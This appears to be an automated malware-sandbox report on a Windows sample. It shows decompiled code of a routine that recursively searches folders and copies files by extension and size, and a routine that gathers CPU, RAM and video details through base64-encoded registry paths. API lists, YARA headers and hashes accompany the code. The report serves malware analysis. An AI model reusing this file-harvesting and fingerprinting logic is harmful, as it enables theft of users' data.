				_t458 = __ebx;
				_t577 = _t578;
				_push(__ecx);
				_t464 = 0x62;
				do {
					_push(0);
					_push(0);
					_t464 = _t464 - 1;
					_t580 = _t464;
				} while (_t464 != 0);
				_t1 =  &_v8;
				 *_t1 = _t464;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v16 =  *_t1;
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				E004040F4( &_v12);
				E004040F4( &_v16);
				E004040F4( &_a20);
				_push(_t577);
				_push(0x414c0d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t578;
				_v20 = 0;
				E004062D8(_v8,  &_v652, _t580);
				E00403BE0( &_v8, _v652);
				E0040377C( &_v656, _a20);
				E0040795C(0x414c2c,  &_v52, _v656, _t580);
				E0040377C( &_v660, _v12);
				E0040795C(0x414c38,  &_v44, _v660, _t580);
				_t239 = E004045EC(_v44);
				_t581 = _t239;
				if(_t239 == 0) {
					L46:
					_pop(_t486);
					 *[fs:eax] = _t486;
					_push(E00414C17);
					E00403B98( &_v792, 2);
					E00403508( &_v784, 2);
					E00403B80( &_v776);
					E00403508( &_v772, 2);
					E00403B98( &_v764, 6);
					E004034E4( &_v740);
					E00403B98( &_v736, 5);
					E00403508( &_v716, 3);
					E00403B98( &_v704, 3);
					E004034E4( &_v692);
					E00403B80( &_v688);
					E004034E4( &_v684);
					E00403B98( &_v680, 5);
					E00403508( &_v660, 2);
					E00403B80( &_v652);
					_t496 =  *0x405f2c; // 0x405f30
					E004047B4( &_v52, _t496);
					E00403B80( &_v48);
					_t497 =  *0x405f2c; // 0x405f30
					E004047B4( &_v44, _t497);
					E00403B98( &_v40, 4);
					_t499 =  *0x4143e4; // 0x4143e8
					E004047B4( &_v24, _t499);
					E00403B98( &_v16, 3);
					_t214 =  &_a20; // 0x414c4c
					return E00403B80(_t214);
				} else {
					_push(E004045EC(_v24) + 1);
					E004047A8();
					_t579 = _t578 + 4;
					_push(_v24 + E004045EC(_v24) * 4 - 4);
					E0040781C(_v8, __ebx,  &_v664, _t581);
					_pop(_t295);
					E00403BBC(_t295, _v664);
					while(E004045EC(_v24) > 0) {
						_t299 =  *0x41b594; // 0x41c828
						_t34 = _t299 + 4; // 0x0
						_t301 =  *_t299 - 0x4b000;
						asm("sbb edx, 0x0");
						_t471 =  *0x41b63c; // 0x41c820
						_t35 = _t471 + 4; // 0x0
						__eflags =  *_t34 -  *_t35;
						if(__eflags != 0) {
							if(__eflags <= 0) {
								goto L46;
							}
							L8:
							E0040781C( *((intOrPtr*)(_v24 + E004045EC(_v24) * 4 - 4)), _t458,  &_v28, __eflags);
							E00403B80(_v24 + E004045EC(_v24) * 4 - 4);
							_t312 = E004045EC(_v24) - 1;
							__eflags = _t312;
							_push(_t312);
							E004047A8();
							_t579 = _t579 + 4;
							E00403DB8( &_v672, 0x414c40, _v28, __eflags);
							E0040781C(_v672, _t458,  &_v668, __eflags);
							_t573 = FindFirstFileW(E00403D3C(_v668),  &_v648);
							do {
								_push(_v28);
								_push(0x414c4c);
								_t474 = 0x104;
								E00403D10( &_v680, 0x104,  &(_v648.cFileName));
								_push(_v680);
								E00403E1C();
								E0040781C(_v676, _t458,  &_v32, __eflags);
								E0040770C(_v32, _t458, 0x104,  &_v36, _t574, __eflags);
								__eflags = (_v648.dwFileAttributes & 0x00000010) - 0x10;
								if((_v648.dwFileAttributes & 0x00000010) == 0x10) {
									L21:
									__eflags = _a8 - 1;
									if(_a8 != 1) {
										L30:
										__eflags = _a12 - 1;
										if(_a12 != 1) {
											goto L43;
										}
										E00403D10( &_v756, 0x104,  &(_v648.cFileName));
										E00403E64(_v756, 0x414c70);
										if(__eflags == 0) {
											goto L43;
										}
										E00403D10( &_v760, 0x104,  &(_v648.cFileName));
										E00403E64(_v760, 0x414c7c);
										if(__eflags == 0) {
											goto L43;
										}
										_t343 = _v648.dwFileAttributes;
										__eflags = (_t343 & 0x00000010) - 0x10;
										if((_t343 & 0x00000010) != 0x10) {
											goto L43;
										}
										__eflags = (_t343 & 0x00000400) - 0x400;
										if(__eflags == 0) {
											goto L43;
										}
										E0040781C(_v32, _t458,  &_v764, __eflags);
										_t349 = GetFileAttributesW(E00403D3C(_v764));
										__eflags = _t349 - 0xffffffff;
										if(_t349 == 0xffffffff) {
											goto L43;
										}
										_v53 = 0;
										_t458 = E004045EC(_v52) - 1;
										__eflags = _t458;
										if(_t458 < 0) {
											L41:
											__eflags = _v53;
											if(_v53 == 0) {
												_t354 = E004045EC(_v24) + 1;
												__eflags = _t354;
												_push(_t354);
												E004047A8();
												_t579 = _t579 + 4;
												E00403BBC(_v24 + E004045EC(_v24) * 4 - 4, _v32);
											}
											goto L43;
										}
										_t460 = _t458 + 1;
										_t575 = 0;
										__eflags = 0;
										do {
											E0040781C(_v32, _t460,  &_v776, __eflags);
											E0040377C( &_v772, _v776);
											E00406318(_v772, _t460,  &_v768, _t573, _t575);
											_push(_v768);
											E00403D2C( &_v792,  *((intOrPtr*)(_v52 + _t575 * 4)));
											E0040781C(_v792, _t460,  &_v788, __eflags);
											E0040377C( &_v784, _v788);
											E00406318(_v784, _t460,  &_v780, _t573, _t575);
											_pop(_t534);
											_t377 = E00403A78(_v780, _t534);
											__eflags = _t377;
											if(_t377 != 0) {
												_v53 = 1;
											}
											_t575 = _t575 + 1;
											_t460 = _t460 - 1;
											__eflags = _t460;
										} while (__eflags != 0);
										goto L41;
									}
									E0040377C( &_v712, _v36);
									E00406318(_v712, _t458,  &_v708, _t573, _t574);
									_t383 = E00403A78(0x414c58, _v708);
									__eflags = _t383;
									if(_t383 == 0) {
										goto L30;
									}
									E004141B8(_v32, _t458,  &_v40, _t574);
									_t387 = E004068EC(_v40);
									__eflags = _t387 - _a16;
									if(_t387 > _a16) {
										goto L30;
									}
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L30;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040770C(_v40, _t458, _t474,  &_v720, _t574, __eflags);
										E0040377C( &_v716, _v720);
										_t474 = 0;
										__eflags = E00406120(_v716, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(__eflags != 0) {
											continue;
										}
										goto L30;
									}
									E0040781C(_v32, _t458,  &_v724, __eflags);
									E00403BE0( &_v32, _v724);
									E0040781C(_v8, _t458,  &_v728, __eflags);
									E00403BE0( &_v8, _v728);
									E0040781C(_v40, _t458,  &_v732, __eflags);
									E00403BE0( &_v40, _v732);
									_push(_v32);
									_push("._.");
									E0040770C(_v40, _t458, 0,  &_v736, _t574, __eflags);
									_push(_v736);
									E00403E1C();
									E00403F34( &_v48, E00403D4C(_v8), 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v748, _t458,  &_v744, __eflags);
									E0040377C( &_v740, _v744);
									_push(_v740);
									E0040781C(_v40, _t458,  &_v752, __eflags);
									_pop(_t556);
									E0040DDB0(_v752, _t458, _t556, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t425 =  *0x41b638; // 0x41b0ac
										 *_t425 =  *_t425 + 1;
									}
									goto L30;
								}
								__eflags = _v648.nFileSizeHigh;
								if(_v648.nFileSizeHigh != 0) {
									goto L21;
								}
								_push(0);
								_push(_v648.nFileSizeLow >> 0xa);
								_t428 = _a16;
								asm("cdq");
								__eflags = 0 - _v56;
								if(__eflags != 0) {
									if(__eflags < 0) {
										goto L21;
									}
									L15:
									_t458 = E004045EC(_v44) - 1;
									__eflags = _t458;
									if(_t458 < 0) {
										goto L21;
									}
									_t458 = _t458 + 1;
									_t574 = 0;
									__eflags = 0;
									while(1) {
										E0040377C( &_v684, _v36);
										_t474 = 0;
										__eflags = E00406120(_v684, _t458, 0,  *((intOrPtr*)(_v44 + _t574 * 4)), _t573, _t574);
										if(__eflags != 0) {
											break;
										}
										_t574 = _t574 + 1;
										_t458 = _t458 - 1;
										__eflags = _t458;
										if(_t458 != 0) {
											continue;
										}
										goto L21;
									}
									E0040781C(_v8, _t458,  &_v688, __eflags);
									E00403BE0( &_v8, _v688);
									E0040781C(_v32, _t458,  &_v48, __eflags);
									_t474 = E00403D4C(_v8);
									E00403F34( &_v48, _t443, 1, __eflags);
									_push(_v16);
									_push(0x414c4c);
									_push(_v48);
									E00403E1C();
									E0040781C(_v700, _t458,  &_v696, __eflags);
									E0040377C( &_v692, _v696);
									_push(_v692);
									E0040781C(_v32, _t458,  &_v704, __eflags);
									_pop(_t570);
									E0040DDB0(_v704, _t458, _t570, _t573, _t574);
									_v20 = _v20 + 1;
									__eflags = _a4 - 1;
									if(_a4 == 1) {
										_t456 =  *0x41b638; // 0x41b0ac
										 *_t456 =  *_t456 + 1;
									}
									goto L21;
								}
								__eflags = _t428 -  *_t579;
								if(_t428 <  *_t579) {
									goto L21;
								}
								goto L15;
								L43:
								_t333 = FindNextFileW(_t573,  &_v648);
								__eflags = _t333;
							} while (_t333 != 0);
							FindClose(_t573);
							continue;
						}
						__eflags = _t301 -  *_t471;
						if(_t301 >  *_t471) {
							goto L8;
						} else {
							goto L46;
						}
					}
					goto L46;
				}
			}




















































































                                                                                                                                                                                          0x00414408
                                                                                                                                                                                          0x00414408
                                                                                                                                                                                          0x00414409
                                                                                                                                                                                          0x0041440b
                                                                                                                                                                                          0x0041440c
                                                                                                                                                                                          0x00414411
                                                                                                                                                                                          0x00414411
                                                                                                                                                                                          0x00414413
                                                                                                                                                                                          0x00414415
                                                                                                                                                                                          0x00414415
                                                                                                                                                                                          0x00414415
                                                                                                                                                                                          0x00414418
                                                                                                                                                                                          0x00414418
                                                                                                                                                                                          0x0041441b
                                                                                                                                                                                          0x0041441c
                                                                                                                                                                                          0x0041441d
                                                                                                                                                                                          0x0041441e
                                                                                                                                                                                          0x00414421
                                                                                                                                                                                          0x00414424
                                                                                                                                                                                          0x0041442a
                                                                                                                                                                                          0x00414432
                                                                                                                                                                                          0x0041443a
                                                                                                                                                                                          0x00414442
                                                                                                                                                                                          0x00414449
                                                                                                                                                                                          0x0041444a
                                                                                                                                                                                          0x0041444f
                                                                                                                                                                                          0x00414452
                                                                                                                                                                                          0x00414457
                                                                                                                                                                                          0x00414463
                                                                                                                                                                                          0x00414471
                                                                                                                                                                                          0x0041447f
                                                                                                                                                                                          0x00414492
                                                                                                                                                                                          0x004144a0
                                                                                                                                                                                          0x004144b3
                                                                                                                                                                                          0x004144bb
                                                                                                                                                                                          0x004144c0
                                                                                                                                                                                          0x004144c2
                                                                                                                                                                                          0x00414ad9
                                                                                                                                                                                          0x00414adb
                                                                                                                                                                                          0x00414ade
                                                                                                                                                                                          0x00414ae1
                                                                                                                                                                                          0x00414af1
                                                                                                                                                                                          0x00414b01
                                                                                                                                                                                          0x00414b0c
                                                                                                                                                                                          0x00414b1c
                                                                                                                                                                                          0x00414b2c
                                                                                                                                                                                          0x00414b37
                                                                                                                                                                                          0x00414b47
                                                                                                                                                                                          0x00414b57
                                                                                                                                                                                          0x00414b67
                                                                                                                                                                                          0x00414b72
                                                                                                                                                                                          0x00414b7d
                                                                                                                                                                                          0x00414b88
                                                                                                                                                                                          0x00414b98
                                                                                                                                                                                          0x00414ba8
                                                                                                                                                                                          0x00414bb3
                                                                                                                                                                                          0x00414bbb
                                                                                                                                                                                          0x00414bc1
                                                                                                                                                                                          0x00414bc9
                                                                                                                                                                                          0x00414bd1
                                                                                                                                                                                          0x00414bd7
                                                                                                                                                                                          0x00414be4
                                                                                                                                                                                          0x00414bec
                                                                                                                                                                                          0x00414bf2
                                                                                                                                                                                          0x00414bff
                                                                                                                                                                                          0x00414c04
                                                                                                                                                                                          0x00414c0c
                                                                                                                                                                                          0x004144c8
                                                                                                                                                                                          0x004144d1
                                                                                                                                                                                          0x004144e0
                                                                                                                                                                                          0x004144e5
                                                                                                                                                                                          0x004144f7
                                                                                                                                                                                          0x00414501
                                                                                                                                                                                          0x0041450c
                                                                                                                                                                                          0x0041450d
                                                                                                                                                                                          0x00414ac9
                                                                                                                                                                                          0x00414517
                                                                                                                                                                                          0x0041451c
                                                                                                                                                                                          0x00414521
                                                                                                                                                                                          0x00414526
                                                                                                                                                                                          0x00414529
                                                                                                                                                                                          0x0041452f
                                                                                                                                                                                          0x0041452f
                                                                                                                                                                                          0x00414532
                                                                                                                                                                                          0x0041453d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414543
                                                                                                                                                                                          0x00414555
                                                                                                                                                                                          0x00414569
                                                                                                                                                                                          0x00414576
                                                                                                                                                                                          0x00414576
                                                                                                                                                                                          0x00414577
                                                                                                                                                                                          0x00414586
                                                                                                                                                                                          0x0041458b
                                                                                                                                                                                          0x004145a3
                                                                                                                                                                                          0x004145b4
                                                                                                                                                                                          0x004145ca
                                                                                                                                                                                          0x004145cc
                                                                                                                                                                                          0x004145cc
                                                                                                                                                                                          0x004145cf
                                                                                                                                                                                          0x004145e0
                                                                                                                                                                                          0x004145e5
                                                                                                                                                                                          0x004145ea
                                                                                                                                                                                          0x004145fb
                                                                                                                                                                                          0x00414609
                                                                                                                                                                                          0x00414614
                                                                                                                                                                                          0x00414622
                                                                                                                                                                                          0x00414625
                                                                                                                                                                                          0x00414759
                                                                                                                                                                                          0x00414759
                                                                                                                                                                                          0x0041475d
                                                                                                                                                                                          0x00414912
                                                                                                                                                                                          0x00414912
                                                                                                                                                                                          0x00414916
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041492d
                                                                                                                                                                                          0x0041493d
                                                                                                                                                                                          0x00414942
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414959
                                                                                                                                                                                          0x00414969
                                                                                                                                                                                          0x0041496e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414974
                                                                                                                                                                                          0x0041497f
                                                                                                                                                                                          0x00414982
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041498d
                                                                                                                                                                                          0x00414992
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004149a1
                                                                                                                                                                                          0x004149b2
                                                                                                                                                                                          0x004149b7
                                                                                                                                                                                          0x004149ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004149c0
                                                                                                                                                                                          0x004149ce
                                                                                                                                                                                          0x004149cf
                                                                                                                                                                                          0x004149d1
                                                                                                                                                                                          0x00414a71
                                                                                                                                                                                          0x00414a71
                                                                                                                                                                                          0x00414a75
                                                                                                                                                                                          0x00414a7f
                                                                                                                                                                                          0x00414a7f
                                                                                                                                                                                          0x00414a80
                                                                                                                                                                                          0x00414a8f
                                                                                                                                                                                          0x00414a94
                                                                                                                                                                                          0x00414aa9
                                                                                                                                                                                          0x00414aa9
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414a75
                                                                                                                                                                                          0x004149d7
                                                                                                                                                                                          0x004149d8
                                                                                                                                                                                          0x004149d8
                                                                                                                                                                                          0x004149da
                                                                                                                                                                                          0x004149e3
                                                                                                                                                                                          0x004149f4
                                                                                                                                                                                          0x00414a05
                                                                                                                                                                                          0x00414a10
                                                                                                                                                                                          0x00414a1d
                                                                                                                                                                                          0x00414a2e
                                                                                                                                                                                          0x00414a3f
                                                                                                                                                                                          0x00414a50
                                                                                                                                                                                          0x00414a5b
                                                                                                                                                                                          0x00414a5c
                                                                                                                                                                                          0x00414a61
                                                                                                                                                                                          0x00414a63
                                                                                                                                                                                          0x00414a65
                                                                                                                                                                                          0x00414a65
                                                                                                                                                                                          0x00414a69
                                                                                                                                                                                          0x00414a6a
                                                                                                                                                                                          0x00414a6a
                                                                                                                                                                                          0x00414a6a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004149da
                                                                                                                                                                                          0x0041476c
                                                                                                                                                                                          0x0041477d
                                                                                                                                                                                          0x0041478d
                                                                                                                                                                                          0x00414792
                                                                                                                                                                                          0x00414794
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004147a0
                                                                                                                                                                                          0x004147a8
                                                                                                                                                                                          0x004147ad
                                                                                                                                                                                          0x004147b0
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004147c0
                                                                                                                                                                                          0x004147c1
                                                                                                                                                                                          0x004147c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004147c9
                                                                                                                                                                                          0x004147ca
                                                                                                                                                                                          0x004147ca
                                                                                                                                                                                          0x004147cc
                                                                                                                                                                                          0x004147d5
                                                                                                                                                                                          0x004147e6
                                                                                                                                                                                          0x004147f7
                                                                                                                                                                                          0x004147fe
                                                                                                                                                                                          0x00414800
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041490a
                                                                                                                                                                                          0x0041490b
                                                                                                                                                                                          0x0041490b
                                                                                                                                                                                          0x0041490c
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0041490c
                                                                                                                                                                                          0x0041480f
                                                                                                                                                                                          0x0041481d
                                                                                                                                                                                          0x0041482b
                                                                                                                                                                                          0x00414839
                                                                                                                                                                                          0x00414847
                                                                                                                                                                                          0x00414855
                                                                                                                                                                                          0x0041485a
                                                                                                                                                                                          0x0041485d
                                                                                                                                                                                          0x0041486b
                                                                                                                                                                                          0x00414870
                                                                                                                                                                                          0x0041487e
                                                                                                                                                                                          0x00414895
                                                                                                                                                                                          0x0041489a
                                                                                                                                                                                          0x0041489d
                                                                                                                                                                                          0x004148a2
                                                                                                                                                                                          0x004148b0
                                                                                                                                                                                          0x004148c1
                                                                                                                                                                                          0x004148d2
                                                                                                                                                                                          0x004148dd
                                                                                                                                                                                          0x004148e7
                                                                                                                                                                                          0x004148f2
                                                                                                                                                                                          0x004148f3
                                                                                                                                                                                          0x004148f8
                                                                                                                                                                                          0x004148fb
                                                                                                                                                                                          0x004148ff
                                                                                                                                                                                          0x00414901
                                                                                                                                                                                          0x00414906
                                                                                                                                                                                          0x00414906
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004148ff
                                                                                                                                                                                          0x0041462b
                                                                                                                                                                                          0x00414632
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414643
                                                                                                                                                                                          0x00414644
                                                                                                                                                                                          0x00414645
                                                                                                                                                                                          0x00414648
                                                                                                                                                                                          0x00414649
                                                                                                                                                                                          0x0041464d
                                                                                                                                                                                          0x0041465e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414664
                                                                                                                                                                                          0x0041466e
                                                                                                                                                                                          0x0041466f
                                                                                                                                                                                          0x00414671
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414677
                                                                                                                                                                                          0x00414678
                                                                                                                                                                                          0x00414678
                                                                                                                                                                                          0x0041467a
                                                                                                                                                                                          0x00414683
                                                                                                                                                                                          0x00414694
                                                                                                                                                                                          0x0041469b
                                                                                                                                                                                          0x0041469d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414751
                                                                                                                                                                                          0x00414752
                                                                                                                                                                                          0x00414752
                                                                                                                                                                                          0x00414753
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414753
                                                                                                                                                                                          0x004146ac
                                                                                                                                                                                          0x004146ba
                                                                                                                                                                                          0x004146c5
                                                                                                                                                                                          0x004146d2
                                                                                                                                                                                          0x004146dc
                                                                                                                                                                                          0x004146e1
                                                                                                                                                                                          0x004146e4
                                                                                                                                                                                          0x004146e9
                                                                                                                                                                                          0x004146f7
                                                                                                                                                                                          0x00414708
                                                                                                                                                                                          0x00414719
                                                                                                                                                                                          0x00414724
                                                                                                                                                                                          0x0041472e
                                                                                                                                                                                          0x00414739
                                                                                                                                                                                          0x0041473a
                                                                                                                                                                                          0x0041473f
                                                                                                                                                                                          0x00414742
                                                                                                                                                                                          0x00414746
                                                                                                                                                                                          0x00414748
                                                                                                                                                                                          0x0041474d
                                                                                                                                                                                          0x0041474d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414746
                                                                                                                                                                                          0x0041464f
                                                                                                                                                                                          0x00414654
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414aae
                                                                                                                                                                                          0x00414ab6
                                                                                                                                                                                          0x00414abb
                                                                                                                                                                                          0x00414abb
                                                                                                                                                                                          0x00414ac4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414ac4
                                                                                                                                                                                          0x00414534
                                                                                                                                                                                          0x00414536
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414538
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414538
                                                                                                                                                                                          0x00414536
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00414ac9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$FileFindFirst
                                                                                                                                                                                          • String ID: .LNK$._.$0_@$LLA$CA
                                                                                                                                                                                          • API String ID: 1653790112-882170572
                                                                                                                                                                                          • Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                          • Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
                                                                                                                                                                                          • Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00416740, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 47%
                                                                                                                                                                                          			E00416740(intOrPtr* __eax, void* __ebx, void* __esi) {
				struct _SYSTEM_INFO _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				signed int _t38;
				signed int _t39;
				signed int _t92;
				void* _t93;
				void* _t94;
				intOrPtr _t113;
				void* _t117;
				intOrPtr _t120;
				intOrPtr _t121;

				_t118 = __esi;
				_t38 = __eax +  *__eax;
				 *_t38 =  *_t38 + _t38;
				_t39 = _t38 | 0x5500000a;
				_t120 = _t121;
				_t93 = 0xb;
				do {
					_push(0);
					_push(0);
					_t93 = _t93 - 1;
					_t124 = _t93;
				} while (_t93 != 0);
				_t92 = _t39;
				_push(_t120);
				_push(0x4168d4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t121;
				GetSystemInfo( &_v40);
				E00403D2C( &_v48,  *_t92);
				_push(_v48);
				_push(L"CPU Model: ");
				_push(0);
				_push( &_v52);
				E00406984("UHJvY2Vzc29yTmFtZVN0cmluZw==", _t92,  &_v60, _t117, __esi);
				E00403D2C( &_v56, _v60);
				_push(_v56);
				E00406984("SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==", _t92,  &_v68, _t117, __esi);
				E00403D2C( &_v64, _v68);
				_pop(_t94);
				E00407500(0x80000002, _t92, _t94, _v64);
				_push(_v52);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v44);
				E004037DC( &_v80, "CPU Count: ",  *_t92);
				E00403D2C( &_v76, _v80);
				_push(_v76);
				E00406FDC(_v40.dwNumberOfProcessors, _t92,  &_v84, __esi, _t124);
				_push(_v84);
				_push(0x416974);
				E00403E1C();
				E0040377C(_t92, _v72);
				_push( *_t92);
				_push("GetRAM: ");
				E00416584( &_v88, _t92, _t118, _t124);
				_push(_v88);
				_push(0x4169ac);
				E00403850();
				_push( *_t92);
				_push("Video Info\r\n");
				E00416644( &_v92, _t92, _t117, _t118);
				_push(_v92);
				E00403850();
				_t113 = 0x4169ac;
				 *[fs:eax] = _t113;
				_push(E004168DB);
				E00403508( &_v92, 2);
				E00403B80( &_v84);
				E004034E4( &_v80);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B80( &_v64);
				E004034E4( &_v60);
				return E00403B98( &_v56, 4);
			}


























                                                                                                                                                                                          0x00416740
                                                                                                                                                                                          0x00416740
                                                                                                                                                                                          0x00416742
                                                                                                                                                                                          0x00416744
                                                                                                                                                                                          0x00416749
                                                                                                                                                                                          0x0041674b
                                                                                                                                                                                          0x00416750
                                                                                                                                                                                          0x00416750
                                                                                                                                                                                          0x00416752
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416754
                                                                                                                                                                                          0x00416758
                                                                                                                                                                                          0x0041675c
                                                                                                                                                                                          0x0041675d
                                                                                                                                                                                          0x00416762
                                                                                                                                                                                          0x00416765
                                                                                                                                                                                          0x0041676c
                                                                                                                                                                                          0x00416776
                                                                                                                                                                                          0x0041677b
                                                                                                                                                                                          0x0041677e
                                                                                                                                                                                          0x00416783
                                                                                                                                                                                          0x00416788
                                                                                                                                                                                          0x00416791
                                                                                                                                                                                          0x0041679c
                                                                                                                                                                                          0x004167a4
                                                                                                                                                                                          0x004167ad
                                                                                                                                                                                          0x004167b8
                                                                                                                                                                                          0x004167c5
                                                                                                                                                                                          0x004167c6
                                                                                                                                                                                          0x004167cb
                                                                                                                                                                                          0x004167ce
                                                                                                                                                                                          0x004167db
                                                                                                                                                                                          0x004167e5
                                                                                                                                                                                          0x004167f4
                                                                                                                                                                                          0x004167ff
                                                                                                                                                                                          0x00416804
                                                                                                                                                                                          0x0041680d
                                                                                                                                                                                          0x00416812
                                                                                                                                                                                          0x00416815
                                                                                                                                                                                          0x00416822
                                                                                                                                                                                          0x0041682c
                                                                                                                                                                                          0x00416831
                                                                                                                                                                                          0x00416833
                                                                                                                                                                                          0x0041683b
                                                                                                                                                                                          0x00416840
                                                                                                                                                                                          0x00416843
                                                                                                                                                                                          0x0041684f
                                                                                                                                                                                          0x00416854
                                                                                                                                                                                          0x00416856
                                                                                                                                                                                          0x0041685e
                                                                                                                                                                                          0x00416863
                                                                                                                                                                                          0x00416872
                                                                                                                                                                                          0x00416879
                                                                                                                                                                                          0x0041687c
                                                                                                                                                                                          0x0041687f
                                                                                                                                                                                          0x0041688c
                                                                                                                                                                                          0x00416894
                                                                                                                                                                                          0x0041689c
                                                                                                                                                                                          0x004168a9
                                                                                                                                                                                          0x004168b1
                                                                                                                                                                                          0x004168b9
                                                                                                                                                                                          0x004168c1
                                                                                                                                                                                          0x004168d3

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                            • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                            • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeString$InfoSystem
                                                                                                                                                                                          • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                          • API String ID: 4070941872-1038824218
                                                                                                                                                                                          • Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                          • Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
                                                                                                                                                                                          • Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59
                                                                                                                                                                                          Uniqueness

